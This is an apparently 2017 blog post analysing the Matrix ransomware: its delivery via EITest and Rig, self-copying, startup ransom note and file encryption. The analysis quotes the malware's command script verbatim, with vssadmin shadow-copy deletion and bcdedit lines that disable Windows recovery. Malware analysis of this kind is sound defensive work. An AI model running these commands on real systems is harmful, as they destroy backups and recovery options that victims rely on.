2017年4月26日水曜日

Ransomware Matrix Analysis

Matrix

I observed that EITest Campaign redirected to RigEK and Matrix was dropped.
It is classified as Version 3 by BleepingComputer.
Please refer to the following Web site.

Can not analyze with Cuckoo

In malwr's analysis report it was displayed as follows.
Maybe cuckoo`s function hook was modified by matrix.
Sorry, I have not found that code yet.
Also, I could not analyze it in my sandbox(Cuckoo 2.0.1). 



Behavior

Memory write and child process generation

Matrix writes the code in memory.
One of them is packed by upx.


Matrix execution file creates a copy of itself with a random_name in the following folder.
%APPDATA%\MICROS~1\[random].exe%APPDATA%\[random]\[random].exe%LOCALAPPDATA%\MICROS~1\%TEMP%\[random].exe 
%TEMP% 

Then, it is executed as a child process.
They have the same hash.
Files under the following folders are deleted after encryption.
%APPDATA%\MICROS~1\[random].exe%APPDATA%\[random]\[random].exe%LOCALAPPDATA%\MICROS~1\%TEMP%\[random].exe  

Executed command

Matrix erases the shadow copy of the volume using the cmd.exe command.
Also Disable startup repair (Windows Recovery Environment) at boot time.

%APPDATA%\[random].cmd
echo vlc091eFKxql4VW4M
ping -n 6 localhost
wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
echo vlc091eFKxql4VW4M
ping -n 3 localhost
cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
ping -n 3 localhost
echo vlc091eFKxql4VW4Mg

Hybrid-analysis.com`s reports show Child process execution parameters of matrix.



This value is sent to the external server with status.



 Show ransom note

Register HTA file ransom note in the startup menu.
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\[randam].hta

Encrypt

Recursively encrypt files in the following two folders.
C:\Users\All Users\ 
C:\Users\user_name\
According to the malware author, it is encrypted by RSA 2048.
Unfortunately it is under investigation.


Analysis report

  • https://malwr.com/analysis/ZWYyY2RiNDFlYzc5NDI2NzkyNWIyYmYxYTUzZmY4NDk/
  • https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47


0 件のコメント:

コメントを投稿